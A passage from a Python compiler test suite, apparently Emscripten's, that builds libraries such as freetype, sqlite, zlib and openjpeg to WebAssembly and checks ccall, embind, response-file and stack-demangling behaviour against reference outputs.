test_file('freetype/ref.txt'),
args=['font.ttf', 'test!', '150', '120', '25'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
# github issue 324
print('[issue 324]')
self.do_run_from_file(test_file('freetype/main_2.c'),
test_file('freetype/ref_2.txt'),
args=['font.ttf', 'w', '32', '32', '25'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
print('[issue 324 case 2]')
self.do_run_from_file(test_file('freetype/main_3.c'),
test_file('freetype/ref_3.txt'),
args=['font.ttf', 'W', '32', '32', '0'],
libraries=self.get_freetype_library(),
includes=[test_file('third_party/freetype/include')])
print('[issue 324 case 3]')
self.do_run('main_3.js',
read_file(test_file('freetype/ref_4.txt')),
args=['font.ttf', 'ea', '40', '32', '0'],
no_build=True)
@no_asan('local count too large for VMs')
@is_slow_test
def test_sqlite(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_sqlite3_open', '_sqlite3_close', '_sqlite3_exec', '_sqlite3_free'])
if '-g' in self.emcc_args:
print("disabling inlining") # without registerize (which -g disables), we generate huge amounts of code
self.set_setting('INLINING_LIMIT')
# newer clang has a warning for implicit conversions that lose information,
# which happens in sqlite (see #9138)
self.emcc_args += ['-Wno-implicit-int-float-conversion']
# newer clang warns about "suspicious concatenation of string literals in an
# array initialization; did you mean to separate the elements with a comma?"
self.emcc_args += ['-Wno-string-concatenation']
# ignore unknown flags, which lets the above flags be used on github CI
# before the LLVM change rolls in (the same LLVM change that adds the
# warning also starts to warn on it)
self.emcc_args += ['-Wno-unknown-warning-option']
self.emcc_args += ['-Wno-pointer-bool-conversion']
self.emcc_args += ['-I' + test_file('third_party/sqlite')]
src = '''
#define SQLITE_DISABLE_LFS
#define LONGDOUBLE_TYPE double
#define SQLITE_INT64_TYPE long long int
#define SQLITE_THREADSAFE 0
'''
src += read_file(test_file('third_party/sqlite/sqlite3.c'))
src += read_file(test_file('sqlite/benchmark.c'))
self.do_run(src,
read_file(test_file('sqlite/benchmark.txt')),
includes=[test_file('sqlite')],
force_c=True)
@needs_make('mingw32-make')
@is_slow_test
@parameterized({
'cmake': (True,),
'configure': (False,)
})
def test_zlib(self, use_cmake):
if WINDOWS and not use_cmake:
self.skipTest("Windows cannot run configure sh scripts")
self.maybe_closure()
self.emcc_args.append('-Wno-shift-negative-value')
if '-g' in self.emcc_args:
self.emcc_args.append('-gsource-map') # more source maps coverage
if use_cmake:
make_args = []
configure = ['cmake', '.']
else:
make_args = ['libz.a']
configure = ['sh', './configure']
self.do_run_from_file(
test_file('third_party/zlib/example.c'),
test_file('core/test_zlib.out'),
libraries=self.get_library('third_party/zlib', 'libz.a', make_args=make_args, configure=configure),
includes=[test_file('third_party/zlib'), 'building', 'zlib'])
@needs_make('make')
@is_slow_test
@parameterized({
'cmake': (True,),
'autoconf': (False,)
})
# Called thus so it runs late in the alphabetical cycle... it is long
def test_bullet(self, use_cmake):
if WINDOWS and not use_cmake:
self.skipTest("Windows cannot run configure sh scripts")
self.emcc_args += [
'-Wno-c++11-narrowing',
'-Wno-deprecated-register',
'-Wno-writable-strings',
'-Wno-shift-negative-value',
'-Wno-format'
]
# extra testing for ASSERTIONS == 2
if use_cmake:
self.set_setting('ASSERTIONS', 2)
self.emcc_args.append('-Wno-unused-command-line-argument')
self.do_runf(test_file('third_party/bullet/Demos/HelloWorld/HelloWorld.cpp'),
[read_file(test_file('bullet/output.txt')), # different roundings
read_file(test_file('bullet/output2.txt')),
read_file(test_file('bullet/output3.txt')),
read_file(test_file('bullet/output4.txt'))],
libraries=self.get_bullet_library(use_cmake),
includes=[test_file('third_party/bullet/src')])
@unittest.skip('LLVM changes have caused this C++ to no longer compile, https://github.com/emscripten-core/emscripten/issues/14614')
@no_asan('issues with freetype itself')
@needs_make('depends on freetype')
@is_slow_test
def test_poppler(self):
pdf_data = read_binary(test_file('poppler/paper.pdf'))
create_file('paper.pdf.js', str(list(bytearray(pdf_data))))
create_file('pre.js', '''
Module.preRun = function() {
FS.createDataFile('/', 'paper.pdf', eval(read_('paper.pdf.js')), true, false, false);
};
Module.postRun = function() {
var FileData = Array.from(MEMFS.getFileDataAsTypedArray(FS.root.contents['filename-1.ppm']));
out("Data: " + JSON.stringify(FileData.map(function(x) { return unSign(x, 8) })));
};
''')
self.emcc_args += ['--pre-js', 'pre.js', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$unSign']
ppm_data = str(list(bytearray(read_binary(test_file('poppler/ref.ppm')))))
self.do_run('', ppm_data.replace(' ', ''),
libraries=self.get_poppler_library(),
args=['-scale-to', '512', 'paper.pdf', 'filename'])
@needs_make('make')
@is_slow_test
def test_openjpeg(self):
def do_test_openjpeg():
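# line_splitter inserts a newline roughly every 60 characters so that the
# stringified byte array embedded in pre.js is not one enormous line.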
def line_splitter(data):
out = ''
counter = 0
for ch in data:
out += ch
if ch == ' ' and counter > 60:
out += '\n'
counter = 0
else:
counter += 1
return out
# remove -g, so we have one test without it by default
self.emcc_args = [x for x in self.emcc_args if x != '-g']
original_j2k = test_file('openjpeg/syntensity_lobby_s.j2k')
image_bytes = list(bytearray(read_binary(original_j2k)))
create_file('pre.js', """
Module.preRun = function() { FS.createDataFile('/', 'image.j2k', %s, true, false, false); };
Module.postRun = function() {
out('Data: ' + JSON.stringify(Array.from(MEMFS.getFileDataAsTypedArray(FS.analyzePath('image.raw').object))));
};
""" % line_splitter(str(image_bytes)))
# ensure libpng is built so that openjpeg's configure step can detect it.
# If we don't do this then we don't know what the state of the cache will be
# and this test would give different non-deterministic results based on, for example,
# what other tests had previously run.
self.run_process([EMBUILDER, 'build', 'libpng'])
lib = self.get_library('third_party/openjpeg',
[Path('codec/CMakeFiles/j2k_to_image.dir/index.c.o'),
Path('codec/CMakeFiles/j2k_to_image.dir/convert.c.o'),
Path('codec/CMakeFiles/j2k_to_image.dir/__/common/color.c.o'),
Path('bin/libopenjpeg.a')],
configure=['cmake', '.'],
# configure_args=['--enable-tiff=no', '--enable-jp3d=no', '--enable-png=no'],
make_args=[]) # no -j 2, since parallel builds can fail
# We use doubles in JS, so we get slightly different values than native code. So we
# check our output by comparing the average pixel difference
def image_compare(output):
# Get the image generated by JS, from the JSON.stringify'd array
m = re.search(r'\[[\d, -]*\]', output)
self.assertIsNotNone(m, 'Failed to find proper image output in: ' + output)
# Evaluate the output as a python array
js_data = eval(m.group(0))
js_data = [x if x >= 0 else 256 + x for x in js_data] # Our output may be signed, so unsign it
# Get the correct output
true_data = bytearray(read_binary(test_file('openjpeg/syntensity_lobby_s.raw')))
# Compare them
assert(len(js_data) == len(true_data))
num = len(js_data)
diff_total = js_total = true_total = 0
for i in range(num):
js_total += js_data[i]
true_total += true_data[i]
diff_total += abs(js_data[i] - true_data[i])
js_mean = js_total / float(num)
true_mean = true_total / float(num)
diff_mean = diff_total / float(num)
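# 83.265 is the expected mean pixel value of the reference image; both the JS
# output and the reference must match it closely, and the mean per-pixel
# difference between them must stay below 0.01.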
image_mean = 83.265
# print '[image stats:', js_mean, image_mean, true_mean, diff_mean, num, ']'
assert abs(js_mean - image_mean) < 0.01, [js_mean, image_mean]
assert abs(true_mean - image_mean) < 0.01, [true_mean, image_mean]
assert diff_mean < 0.01, diff_mean
return output
# Explicitly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.emcc_args += ['--minify=0'] # to compare the versions
self.emcc_args += ['--pre-js', 'pre.js']
def do_test():
self.do_runf(test_file('third_party/openjpeg/codec/j2k_to_image.c'),
'Successfully generated', # The real test for valid output is in image_compare
args='-i image.j2k -o image.raw'.split(),
emcc_args=['-sUSE_LIBPNG'],
libraries=lib,
includes=[test_file('third_party/openjpeg/libopenjpeg'),
test_file('third_party/openjpeg/codec'),
test_file('third_party/openjpeg/common'),
Path(self.get_build_dir(), 'third_party/openjpeg')],
output_nicerizer=image_compare)
do_test()
# extra testing
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1:
print('no memory growth', file=sys.stderr)
self.set_setting('ALLOW_MEMORY_GROWTH', 0)
do_test()
if is_sanitizing(self.emcc_args):
# In ASan mode we need a large initial memory (or else wasm-ld fails).
# The OpenJPEG CMake will build several executables (which we need parts
# of in our testing, see above), so we must enable the flag for them all.
with env_modify({'EMCC_CFLAGS': '-sINITIAL_MEMORY=300MB'}):
do_test_openjpeg()
else:
do_test_openjpeg()
@also_with_standalone_wasm(wasm2c=True, impure=True)
@no_asan('autodebug logging interferes with asan')
@with_env_modify({'EMCC_AUTODEBUG': '1'})
def test_autodebug_wasm(self):
# test that the program both works and also emits some of the logging
# (but without the specific output, as it is logging the actual locals
# used and so forth, which will change between opt modes and updates of
# llvm etc.)
def check(out):
for msg in ['log_execution', 'get_i32', 'set_i32', 'load_ptr', 'load_val', 'store_ptr', 'store_val']:
self.assertIn(msg, out)
return out
self.do_runf(test_file('core/test_autodebug.c'),
'success', output_nicerizer=check)
@parameterized({
'full': ('full',),
'mask': ('mask',),
'none': ('none',),
})
def test_wasm2c_sandboxing(self, mode):
if not can_do_standalone(self):
return self.skipTest('standalone mode not supported')
self.set_setting('STANDALONE_WASM')
self.set_setting('WASM2C')
self.set_setting('WASM2C_SANDBOXING', mode)
self.wasm_engines = []
self.do_core_test('test_hello_world.c')
### Integration tests
def test_ccall(self):
self.emcc_args.append('-Wno-return-stack-address')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ccall', 'cwrap'])
self.set_setting('WASM_ASYNC_COMPILATION', 0)
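# post.js below exercises ccall with every supported return/argument type
# (number, boolean, string, array, pointer), cwrap wrappers, and many repeated
# calls to verify that the stack is restored correctly afterwards.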
create_file('post.js', '''
out('*');
var ret;
ret = Module['ccall']('get_int', 'number'); out([typeof ret, ret].join(','));
ret = ccall('get_float', 'number'); out([typeof ret, ret.toFixed(2)].join(','));
ret = ccall('get_bool', 'boolean'); out([typeof ret, ret].join(','));
ret = ccall('get_string', 'string'); out([typeof ret, ret].join(','));
ret = ccall('print_int', null, ['number'], [12]); out(typeof ret);
ret = ccall('print_float', null, ['number'], [14.56]); out(typeof ret);
ret = ccall('print_bool', null, ['boolean'], [true]); out(typeof ret);
ret = ccall('print_string', null, ['string'], ["cheez"]); out(typeof ret);
ret = ccall('print_string', null, ['array'], [[97, 114, 114, 45, 97, 121, 0]]); out(typeof ret); // JS array
ret = ccall('print_string', null, ['array'], [new Uint8Array([97, 114, 114, 45, 97, 121, 0])]); out(typeof ret); // typed array
ret = ccall('multi', 'number', ['number', 'number', 'number', 'string'], [2, 1.4, 3, 'more']); out([typeof ret, ret].join(','));
var p = ccall('malloc', 'pointer', ['number'], [4]);
setValue(p, 650, 'i32');
ret = ccall('pointer', 'pointer', ['pointer'], [p]); out([typeof ret, getValue(ret, 'i32')].join(','));
out('*');
// part 2: cwrap
var noThirdParam = Module['cwrap']('get_int', 'number');
out(noThirdParam());
var multi = Module['cwrap']('multi', 'number', ['number', 'number', 'number', 'string']);
out(multi(2, 1.4, 3, 'atr'));
out(multi(8, 5.4, 4, 'bret'));
out('*');
// part 3: avoid stack explosion and check it's restored correctly
for (var i = 0; i < TOTAL_STACK/60; i++) {
ccall('multi', 'number', ['number', 'number', 'number', 'string'], [0, 0, 0, '123456789012345678901234567890123456789012345678901234567890']);
}
out('stack is ok.');
ccall('call_ccall_again', null);
''')
self.emcc_args += ['--post-js', 'post.js']
self.set_setting('EXPORTED_FUNCTIONS', ['_get_int', '_get_float', '_get_bool', '_get_string', '_print_int', '_print_float', '_print_bool', '_print_string', '_multi', '_pointer', '_call_ccall_again', '_malloc'])
self.do_core_test('test_ccall.cpp')
if self.maybe_closure():
self.do_core_test('test_ccall.cpp')
def test_EXPORTED_RUNTIME_METHODS(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$dynCall'])
self.do_core_test('EXPORTED_RUNTIME_METHODS.c')
# test dyncall (and other runtime methods in support.js) can be exported
self.emcc_args += ['-DEXPORTED']
self.set_setting('EXPORTED_RUNTIME_METHODS', ['dynCall', 'addFunction', 'lengthBytesUTF8', 'getTempRet0', 'setTempRet0'])
self.do_core_test('EXPORTED_RUNTIME_METHODS.c')
@parameterized({
'': [],
'minimal_runtime': ['-sMINIMAL_RUNTIME=1']
})
def test_dyncall_specific(self, *args):
cases = [
('DIRECT', []),
('DYNAMIC_SIG', ['-sDYNCALLS=1', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$dynCall']),
]
if '-sMINIMAL_RUNTIME=1' in args:
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
else:
cases += [
('EXPORTED', []),
('EXPORTED_DYNAMIC_SIG', ['-sDYNCALLS=1', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$dynCall', '-sEXPORTED_RUNTIME_METHODS=dynCall']),
('FROM_OUTSIDE', ['-sEXPORTED_RUNTIME_METHODS=dynCall_iiji'])
]
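# Each case rebuilds dyncall_specific.c with a -D define (plus matching link
# flags) selecting how the dynCall is performed.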
for which, extra_args in cases:
print(str(args) + ' ' + which)
self.do_core_test('dyncall_specific.c', emcc_args=['-D' + which] + list(args) + extra_args)
def test_getValue_setValue(self):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
src = test_file('core/getValue_setValue.cpp')
expected = test_file('core/getValue_setValue' + output_prefix + '.out')
self.do_run_from_file(src, expected, assert_returncode=assert_returncode, emcc_args=args)
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['getValue', 'setValue'])
test()
@parameterized({
'': ([],),
'_files': (['-DUSE_FILES'],)
})
def test_FS_exports(self, extra_args):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
args += extra_args
print(args)
self.do_runf(test_file('core/FS_exports.cpp'),
(read_file(test_file('core/FS_exports' + output_prefix + '.out')),
read_file(test_file('core/FS_exports' + output_prefix + '_2.out'))),
assert_returncode=assert_returncode, emcc_args=args)
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT', '-sFORCE_FILESYSTEM'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['FS_createDataFile'])
test(args=['-sFORCE_FILESYSTEM'])
def test_legacy_exported_runtime_numbers(self):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
old = self.emcc_args.copy()
self.emcc_args += args
src = test_file('core/legacy_exported_runtime_numbers.cpp')
expected = test_file('core/legacy_exported_runtime_numbers%s.out' % output_prefix)
self.do_run_from_file(src, expected, assert_returncode=assert_returncode)
self.emcc_args = old
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ALLOC_STACK'])
test()
def test_response_file(self):
response_data = '-o %s/response_file.js %s' % (self.get_dir(), test_file('hello_world.cpp'))
create_file('rsp_file', response_data.replace('\\', '\\\\'))
self.run_process([EMCC, "@rsp_file"] + self.get_emcc_args())
self.do_run('response_file.js', 'hello, world', no_build=True)
self.assertContained('response file not found: foo.txt', self.expect_fail([EMCC, '@foo.txt']))
def test_linker_response_file(self):
objfile = 'response_file.o'
self.run_process([EMCC, '-c', test_file('hello_world.cpp'), '-o', objfile] + self.get_emcc_args(ldflags=False))
# This should expand into -Wl,--start-group <objfile> -Wl,--end-group
response_data = '--start-group ' + objfile + ' --end-group'
create_file('rsp_file', response_data.replace('\\', '\\\\'))
self.run_process([EMCC, "-Wl,@rsp_file", '-o', 'response_file.o.js'] + self.get_emcc_args())
self.do_run('response_file.o.js', 'hello, world', no_build=True)
def test_exported_response(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <emscripten.h>
extern "C" {
int other_function() { return 5; }
}
int main() {
int x = EM_ASM_INT({ return Module._other_function() });
emscripten_run_script_string(""); // Add a reference to a symbol that exists in src/deps_info.json to uncover issue #2836 in the test suite.
printf("waka %d!\n", x);
return 0;
}
'''
create_file('exps', '["_main","_other_function"]')
self.set_setting('EXPORTED_FUNCTIONS', '@exps')
self.do_run(src, '''waka 5!''')
assert 'other_function' in read_file('src.js')
def test_large_exported_response(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <emscripten.h>
extern "C" {
'''
js_funcs = []
num_exports = 5000
count = 0
while count < num_exports:
src += 'int exported_func_from_response_file_%d () { return %d;}\n' % (count, count)
js_funcs.append('_exported_func_from_response_file_%d' % count)
count += 1
src += r'''
}
int main() {
int x = EM_ASM_INT({ return Module._exported_func_from_response_file_4999() });
emscripten_run_script_string(""); // Add a reference to a symbol that exists in src/deps_info.json to uncover issue #2836 in the test suite.
printf("waka %d!\n", x);
return 0;
}
'''
js_funcs.append('_main')
create_file('large_exported_response.json', json.dumps(js_funcs))
self.set_setting('EXPORTED_FUNCTIONS', '@large_exported_response.json')
self.do_run(src, 'waka 4999!')
self.assertContained('_exported_func_from_response_file_1', read_file('src.js'))
@no_memory64('gives: TypeError: WebAssembly.Table.set(): Argument 1 must be null or a WebAssembly function')
def test_add_function(self):
self.set_setting('INVOKE_RUN', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.set_setting('RESERVED_FUNCTION_POINTERS')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['callMain'])
src = test_file('interop/test_add_function.cpp')
post_js = test_file('interop/test_add_function_post.js')
self.emcc_args += ['--post-js', post_js]
print('basics')
self.do_run_in_out_file_test('interop/test_add_function.cpp')
print('with RESERVED_FUNCTION_POINTERS=0')
self.set_setting('RESERVED_FUNCTION_POINTERS', 0)
expected = 'Unable to grow wasm table'
if self.is_wasm2js():
# in wasm2js the error message doesn't come from the VM, but from our
# emulation code. when ASSERTIONS are enabled we show a clear message, but
# in optimized builds we don't waste code size on that, and the JS engine
# shows a generic error.
expected = 'wasmTable.grow is not a function'
self.do_runf(src, expected, assert_returncode=NON_ZERO)
print('- with table growth')
self.set_setting('ALLOW_TABLE_GROWTH')
self.emcc_args += ['-DGROWTH']
# enable costly assertions to verify correct table behavior
self.set_setting('ASSERTIONS', 2)
self.do_run_in_out_file_test('interop/test_add_function.cpp', interleaved_output=False)
def test_getFuncWrapper_sig_alias(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$getFuncWrapper'])
src = r'''
#include <stdio.h>
#include <emscripten.h>
void func1(int a) {
printf("func1\n");
}
void func2(int a, int b) {
printf("func2\n");
}
int main() {
EM_ASM({
getFuncWrapper($0, 'vi')(0);
getFuncWrapper($1, 'vii')(0, 0);
}, func1, func2);
return 0;
}
'''
self.do_run(src, 'func1\nfunc2\n')
def test_emulate_function_pointer_casts(self):
# Forcibly disable EXIT_RUNTIME due to:
# https://github.com/emscripten-core/emscripten/issues/15081
self.set_setting('EXIT_RUNTIME', 0)
self.set_setting('EMULATE_FUNCTION_POINTER_CASTS')
self.do_core_test('test_emulate_function_pointer_casts.cpp')
@no_wasm2js('TODO: nicely printed names in wasm2js')
@parameterized({
'normal': ([],),
'noexcept': (['-fno-exceptions'],)
})
def test_demangle_stacks(self, extra_args):
self.emcc_args += extra_args
self.set_setting('DEMANGLE_SUPPORT')
self.set_setting('ASSERTIONS')
# disable aggressive inlining in binaryen
self.set_setting('BINARYEN_EXTRA_PASSES', '--one-caller-inline-max-function-size=1')
# ensure function names are preserved
self.emcc_args += ['--profiling-funcs']
self.do_core_test('test_demangle_stacks.cpp', assert_returncode=NON_ZERO)
# there should be a name section in the file
self.assertTrue(webassembly.Module('test_demangle_stacks.wasm').has_name_section())
print('without assertions, the stack is not printed, but a message suggesting assertions is')
self.set_setting('ASSERTIONS', 0)
self.do_core_test('test_demangle_stacks_noassert.cpp', assert_returncode=NON_ZERO)
def test_demangle_stacks_symbol_map(self):
# disable aggressive inlining in binaryen
self.set_setting('BINARYEN_EXTRA_PASSES', '--one-caller-inline-max-function-size=1')
self.set_setting('DEMANGLE_SUPPORT')
if '-O' not in str(self.emcc_args) or '-O0' in self.emcc_args or '-O1' in self.emcc_args or '-g' in self.emcc_args:
self.skipTest("without opts, we don't emit a symbol map")
self.emcc_args += ['--emit-symbol-map']
self.do_runf(test_file('core/test_demangle_stacks.cpp'), 'Aborted', assert_returncode=NON_ZERO)
# make sure the shortened name is the right one
full_aborter = None
short_aborter = None
for line in open('test_demangle_stacks.js.symbols').readlines():
if ':' not in line:
continue
# split by the first ':' (wasm backend demangling may include more :'s later on)
short, full = line.split(':', 1)
if 'Aborter' in full:
short_aborter = short
full_aborter = full
self.assertIsNotNone(full_aborter)
self.assertIsNotNone(short_aborter)
print('full:', full_aborter, 'short:', short_aborter)
if config.SPIDERMONKEY_ENGINE and os.path.exists(config.SPIDERMONKEY_ENGINE[0]):
output = self.run_js('test_demangle_stacks.js', engine=config.SPIDERMONKEY_ENGINE, assert_returncode=NON_ZERO)
# we may see the full one, if -g, or the short one if not
if ' ' + short_aborter + ' ' not in output and ' ' + full_aborter + ' ' not in output:
# stack traces may also be ' name ' or 'name@' etc
if '\n' + short_aborter + ' ' not in output and '\n' + full_aborter + ' ' not in output and 'wasm-function[' + short_aborter + ']' not in output:
if '\n' + short_aborter + '@' not in output and '\n' + full_aborter + '@' not in output:
self.assertContained(' ' + short_aborter + ' ' + '\n' + ' ' + full_aborter + ' ', output)
@no_safe_heap('tracing from sbrk into JS leads to an infinite loop')
def test_tracing(self):
self.emcc_args += ['--tracing']
self.do_core_test('test_tracing.c')
@no_wasm2js('eval_ctors not supported yet')
@also_with_standalone_wasm()
def test_eval_ctors(self):
if '-O2' not in str(self.emcc_args) or '-O1' in str(self.emcc_args):
self.skipTest('need opts')
print('leave printf in ctor')
self.set_setting('EVAL_CTORS')
self.do_run(r'''
#include <stdio.h>
struct C {
C() { printf("constructing!\n"); } // don't remove this!
};
C c;
int main() {}
''', "constructing!\n")
def do_test(test, level=1, prefix='src'):
def get_code_size():
if self.is_wasm():
# this also includes the memory, but it is close enough for our
# purposes
return self.measure_wasm_code_lines(prefix + '.wasm')
else:
return os.path.getsize(prefix + '.js')
self.set_setting('EVAL_CTORS', level)
test()
ec_code_size = get_code_size()
self.clear_setting('EVAL_CTORS')
test()
code_size = get_code_size()
print('code:', code_size, '=>', ec_code_size)
self.assertLess(ec_code_size, code_size)
print('remove ctor of just assigns to memory')
def test1():
self.do_run(r'''
#include <stdio.h>
struct C {
int x;
C() {
volatile int y = 10;
y++;
x = y;
}
};
C c;
int main() {
printf("x: %d\n", c.x);
}
''', "x: 11\n")
do_test(test1)
print('libcxx - remove 2 ctors from iostream code')
output = 'hello, world!'
def test2():
self.do_runf(test_file('hello_libcxx.cpp'), output)
# in standalone mode there is more usage of WASI APIs, which mode 2 is
# needed to avoid in order to fully optimize, so do not test mode 1 in
# that mode.
if not self.get_setting('STANDALONE_WASM'):
do_test(test2, level=1, prefix='hello_libcxx')
do_test(test2, level=2, prefix='hello_libcxx')
def test_embind(self):
# Verify that both the old `--bind` arg and the new `-lembind` arg work
for args in [['-lembind'], ['--bind']]:
create_file('test_embind.cpp', r'''
#include <stdio.h>
#include <emscripten/val.h>
using namespace emscripten;
int main() {
val Math = val::global("Math");
// two ways to call Math.abs
printf("abs(-10): %d\n", Math.call<int>("abs", -10));
printf("abs(-11): %d\n", Math["abs"](-11).as<int>());
return 0;
}
''')
self.do_runf('test_embind.cpp', 'abs(-10): 10\nabs(-11): 11', emcc_args=args)
def test_embind_2(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function printLerp() {
out('lerp ' + Module.lerp(100, 200, 66) + '.');
}
''')
create_file('test_embind_2.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
#include <emscripten/bind.h>
using namespace emscripten;
int lerp(int a, int b, int t) {
return (100 - t) * a + t * b;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("lerp", &lerp);
}
int main(int argc, char **argv) {
EM_ASM(printLerp());
return 0;
}
''')
self.do_runf('test_embind_2.cpp', 'lerp 166')
def test_embind_3(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function ready() {
try {
Module.compute(new Uint8Array([1,2,3]));
} catch(e) {
out(e);
}
}
''')
create_file('test_embind_3.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
using namespace emscripten;
int compute(int array[]) {
return 0;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("compute", &compute, allow_raw_pointers());
}
int main(int argc, char **argv) {
EM_ASM(ready());
return 0;
}
''')
self.do_runf('test_embind_3.cpp', 'UnboundTypeError: Cannot call compute due to unbound types: Pi')
def test_embind_4(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function printFirstElement() {
out(Module.getBufferView()[0]);
}
''')
create_file('test_embind_4.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
using namespace emscripten;
const size_t kBufferSize = 1024;
double buffer[kBufferSize];
val getBufferView(void) {
val v = val(typed_memory_view(kBufferSize, buffer));
return v;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("getBufferView", &getBufferView);
}
int main(int argc, char **argv) {
buffer[0] = 107;
EM_ASM(printFirstElement());
return 0;
}
''')
self.do_runf('test_embind_4.cpp', '107')
def test_embind_5(self):
self.emcc_args += ['-lembind']
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_embind_5.cpp')
def test_embind_custom_marshal(self):
self.emcc_args += ['-lembind', '--pre-js', test_file('embind/test_custom_marshal.js')]
self.do_run_in_out_file_test('embind/test_custom_marshal.cpp', assert_identical=True)
def test_embind_float_constants(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_float_constants.cpp')
def test_embind_negative_constants(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_negative_constants.cpp')
@also_with_wasm_bigint
def test_embind_unsigned(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_unsigned.cpp')
def test_embind_val(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_val.cpp')
def test_embind_val_assignment(self):
err = self.expect_fail([EMCC, test_file('embind/test_val_assignment.cpp'), '-lembind', '-c'])
self.assertContained('candidate function not viable: expects an lvalue for object argument', err)
@no_wasm2js('wasm_bigint')
def test_embind_i64_val(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-lembind']
self.node_args += ['--experimental-wasm-bigint']
self.do_run_in_out_file_test('embind/test_i64_val.cpp', assert_identical=True)
@no_wasm2js('wasm_bigint')
def test_embind_i64_binding(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-lembind']
self.node_args += ['--experimental-wasm-bigint']
self.do_run_in_out_file_test('embind/test_i64_binding.cpp', assert_identical=True)
def test_embind_no_rtti(self):
create_file('main.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
EM_JS(void, calltest, (), {
console.log("dotest returned: " + Module.dotest());
});
int main(int argc, char** argv){
printf("418\n");
calltest();
return 0;
}
int test() {
return 42;
}
EMSCRIPTEN_BINDINGS(my_module) {
emscripten::function("dotest", &test);
}
''')
self.emcc_args += ['-lembind', '-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
self.do_runf('main.cpp', '418\ndotest returned: 42\n')
def test_embind_polymorphic_class_no_rtti(self):
self.emcc_args += ['-lembind', '-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
self.do_core_test('test_embind_polymorphic_class_no_rtti.cpp')
def test_embind_no_rtti_followed_by_rtti(self):
src = r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
EM_JS(void, calltest, (), {
console.log("dotest returned: " + Module.dotest());
});
int main(int argc, char** argv){
printf("418\n");
calltest();
return 0;
}
int test() {
return 42;
}
EMSCRIPTEN_BINDINGS(my_module) {
emscripten::function("dotest", &test);
}
'''
self.emcc_args += ['-lembind', '-fno-rtti', '-frtti']
self.do_run(src, '418\ndotest returned: 42\n')
@parameterized({
'': (None, False),
'all': ('ALL', False),
'fast': ('FAST', False),
'default': ('DEFAULT', False),
'all_growth': ('ALL', True),
})
def test_webidl(self, mode, allow_memory_growth):
self.uses_es6 = True
# TODO(): Remove once we make webidl output closure-warning free.
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
self.set_setting('WASM_ASYNC_COMPILATION', 0)
if self.maybe_closure():
# avoid closure minified names competing with our test code in the global name space
self.set_setting('MODULARIZE')
else:
self.set_setting('WASM_ASYNC_COMPILATION', 0)
# Force IDL checks mode
with env_modify({'IDL_CHECKS': mode}):
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
post_js = '\n\n'
